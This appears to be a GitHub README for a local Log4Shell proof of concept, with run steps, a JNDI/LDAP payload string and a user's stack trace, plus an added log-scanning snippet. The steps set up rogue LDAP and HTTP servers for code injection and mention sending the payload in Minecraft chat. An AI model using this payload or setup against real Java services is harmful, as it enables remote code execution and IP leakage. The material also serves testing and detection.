log4j2 remote code execution or IP leakage exploit (with examples)

Overview

log4j2-exploits

The underlying vulnerability was reported as CVE-2018-3149 and patched as described in this article. (8u121 Release Notes)

However, log4j2, a logging library for Java, includes JndiLookup, which can reach protocols such as LDAP; on older Java versions this allows code injection.

Patched versions of Java can prevent the code injection, but JndiLookup still makes a request to the LDAP server, which can lead to IP leaks.

The solution is to update Java and log4j2 versions.
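
For checking whether such lookups have already reached a logged input, the following Node.js snippet is an added example (not code from this repository) that scans log lines for the literal `${jndi:...}` form shown on this page and reports the destination each lookup would contact. The function names, the sample log lines and the host `ldap.example.test` are constructed for illustration.

```javascript
// Added example: flag JNDI lookup strings in application log lines.
// Matches only the literal ${jndi:scheme://host[:port]/path} form shown on this page.
const JNDI_RE = /\$\{jndi:([a-z]+):\/\/([^\/:}\s]+)(?::(\d+))?(\/[^}\s]*)?\}/gi;

// Default ports used when the lookup string does not name one.
const DEFAULT_PORTS = { ldap: 389, ldaps: 636, rmi: 1099, dns: 53 };

// Return every JNDI lookup found in one log line, split into its parts.
function findJndiLookups(line) {
  const hits = [];
  for (const m of line.matchAll(JNDI_RE)) {
    const scheme = m[1].toLowerCase();
    hits.push({
      scheme,
      host: m[2],
      port: m[3] ? Number(m[3]) : (DEFAULT_PORTS[scheme] ?? null),
      path: m[4] || "/",
      raw: m[0],
    });
  }
  return hits;
}

// Loopback destinations indicate local testing; anything else means the
// JVM would contact another machine, which is the IP-leak case.
function isLoopback(host) {
  return host === "localhost" || /^127\.\d+\.\d+\.\d+$/.test(host);
}

// Scan an array of log lines and return one finding per lookup string.
function scanLog(lines) {
  const findings = [];
  lines.forEach((line, i) => {
    for (const hit of findJndiLookups(line)) {
      findings.push({ lineNo: i + 1, external: !isLoopback(hit.host), ...hit });
    }
  });
  return findings;
}

// Constructed sample log lines (not taken from a real system).
const SAMPLE_LOG = [
  "2021-12-13 08:50:11 INFO  [chat] <alice> hello",
  "2021-12-13 08:50:12 INFO  [chat] <bob> ${jndi:ldap://127.0.0.1:3001/}",
  "2021-12-13 08:50:13 INFO  [http] User-Agent: ${jndi:ldap://ldap.example.test/a}",
];

for (const f of scanLog(SAMPLE_LOG)) {
  console.log(`line ${f.lineNo}: ${f.scheme}://${f.host}:${f.port}${f.path} external=${f.external}`);
}
```

A finding with `external=true` is worth correlating with outbound connection logs for the same host and port, since even a patched JVM makes that request.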

Running

  1. Install requirements
     (cd http-server && npm install)
     (cd ldap-server && npm install)
  2. Run both http-server and ldap-server
     # Each server keeps running, so start each one in its own terminal.
     cd http-server && node index.js
     cd ldap-server && node index.js
  3. Compile Main.java
     # This generates Main.class, which is required for code injection.
     javac Main.java
  4. Start the JVM with parameters
     # You can still use the log4j-client in this repo for internal testing.
     cd log4j-client
     gradlew jar
     java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar build/libs/log4j-client-1.0-SNAPSHOT.jar
     # Or run another application. com.sun.jndi.ldap.object.trustURLCodebase=true is required for code injection; otherwise the JVM only makes a request to the LDAP server.
     java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar [yourJar].jar
  5. Send ${jndi:ldap://127.0.0.1:3001/} in any payload. (In Minecraft, simply sending this in chat works if the exploit is working.)

License

CC0

Comments
  • I get java.lang.ClassCastException for Main

    Thanks a ton for your great local exploit! I'm just having a problem on Ubuntu with OpenJDK 11. When I run the log4j-client-1.0-SNAPSHOT.jar file and pass in the string ${jndi:ldap://127.0.0.1:3001}, I get the following error:

    Mon Dec 13 2021 08:50:12 GMT-0800 (Pacific Standard Time) Request was made: /Main.class
    2021-12-13 08:50:12,761 main WARN Error looking up JNDI resource [ldap://127.0.0.1:3001/]. javax.naming.NamingException: problem generating object using object factory [Root exception is java.lang.ClassCastException: class Main cannot be cast to class javax.naming.spi.ObjectFactory (Main is in unnamed module of loader java.net.FactoryURLClassLoader @2f217633; javax.naming.spi.ObjectFactory is in module java.naming of loader 'bootstrap')]; remaining name ''
        at java.naming/com.sun.jndi.ldap.LdapCtx.c_lookup(LdapCtx.java:1121)
        at java.naming/com.sun.jndi.toolkit.ctx.ComponentContext.p_lookup(ComponentContext.java:542)
        at java.naming/com.sun.jndi.toolkit.ctx.PartialCompositeContext.lookup(PartialCompositeContext.java:177)
        at java.naming/com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:207)
        at java.naming/com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)
        at java.naming/javax.naming.InitialContext.lookup(InitialContext.java:409)
        at org.apache.logging.log4j.core.net.JndiManager.lookup(JndiManager.java:172)
        at org.apache.logging.log4j.core.lookup.JndiLookup.lookup(JndiLookup.java:56)
        at org.apache.logging.log4j.core.lookup.Interpolator.lookup(Interpolator.java:198)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.resolveVariable(StrSubstitutor.java:1060)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:982)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:878)
        at org.apache.logging.log4j.core.lookup.StrSubstitutor.replace(StrSubstitutor.java:433)
        at org.apache.logging.log4j.core.pattern.MessagePatternConverter.format(MessagePatternConverter.java:132)
        at org.apache.logging.log4j.core.pattern.PatternFormatter.format(PatternFormatter.java:38)
        at org.apache.logging.log4j.core.layout.PatternLayout$PatternSerializer.toSerializable(PatternLayout.java:341)
        at org.apache.logging.log4j.core.layout.PatternLayout.toText(PatternLayout.java:240)
        at org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:225)
        at org.apache.logging.log4j.core.layout.PatternLayout.encode(PatternLayout.java:59)
        at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.directEncodeEvent(AbstractOutputStreamAppender.java:197)
        at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.tryAppend(AbstractOutputStreamAppender.java:190)
        at org.apache.logging.log4j.core.appender.AbstractOutputStreamAppender.append(AbstractOutputStreamAppender.java:181)
        at org.apache.logging.log4j.core.config.AppenderControl.tryCallAppender(AppenderControl.java:156)
        at org.apache.logging.log4j.core.config.AppenderControl.callAppender0(AppenderControl.java:129)
        at org.apache.logging.log4j.core.config.AppenderControl.callAppenderPreventRecursion(AppenderControl.java:120)
        at org.apache.logging.log4j.core.config.AppenderControl.callAppender(AppenderControl.java:84)
        at org.apache.logging.log4j.core.config.LoggerConfig.callAppenders(LoggerConfig.java:543)
        at org.apache.logging.log4j.core.config.LoggerConfig.processLogEvent(LoggerConfig.java:502)
        at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:485)
        at org.apache.logging.log4j.core.config.LoggerConfig.log(LoggerConfig.java:460)
        at org.apache.logging.log4j.core.config.AwaitCompletionReliabilityStrategy.log(AwaitCompletionReliabilityStrategy.java:82)
        at org.apache.logging.log4j.core.Logger.log(Logger.java:162)
        at org.apache.logging.log4j.spi.AbstractLogger.tryLogMessage(AbstractLogger.java:2190)
        at org.apache.logging.log4j.spi.AbstractLogger.logMessageTrackRecursion(AbstractLogger.java:2144)
        at org.apache.logging.log4j.spi.AbstractLogger.logMessageSafely(AbstractLogger.java:2127)
        at org.apache.logging.log4j.spi.AbstractLogger.logMessage(AbstractLogger.java:2003)
        at org.apache.logging.log4j.spi.AbstractLogger.logIfEnabled(AbstractLogger.java:1975)
        at org.apache.logging.log4j.spi.AbstractLogger.trace(AbstractLogger.java:2330)
        at win.roto.client.Main.main(Main.java:33)
    Caused by: java.lang.ClassCastException: class Main cannot be cast to class javax.naming.spi.ObjectFactory (Main is in unnamed module of loader java.net.FactoryURLClassLoader @2f217633; javax.naming.spi.ObjectFactory is in module java.naming of loader 'bootstrap')
        at java.naming/javax.naming.spi.NamingManager.getObjectFactoryFromReference(NamingManager.java:179)
        at java.naming/javax.naming.spi.DirectoryManager.getObjectInstance(DirectoryManager.java:188)
        at java.naming/com.sun.jndi.ldap.LdapCtx.c_lookup(LdapCtx.java:1114)
        ... 38 more

    I can see that it's certainly trying to trigger the vulnerability, but fails.

    opened by franktate 1
Owner
ilsubyeega-desu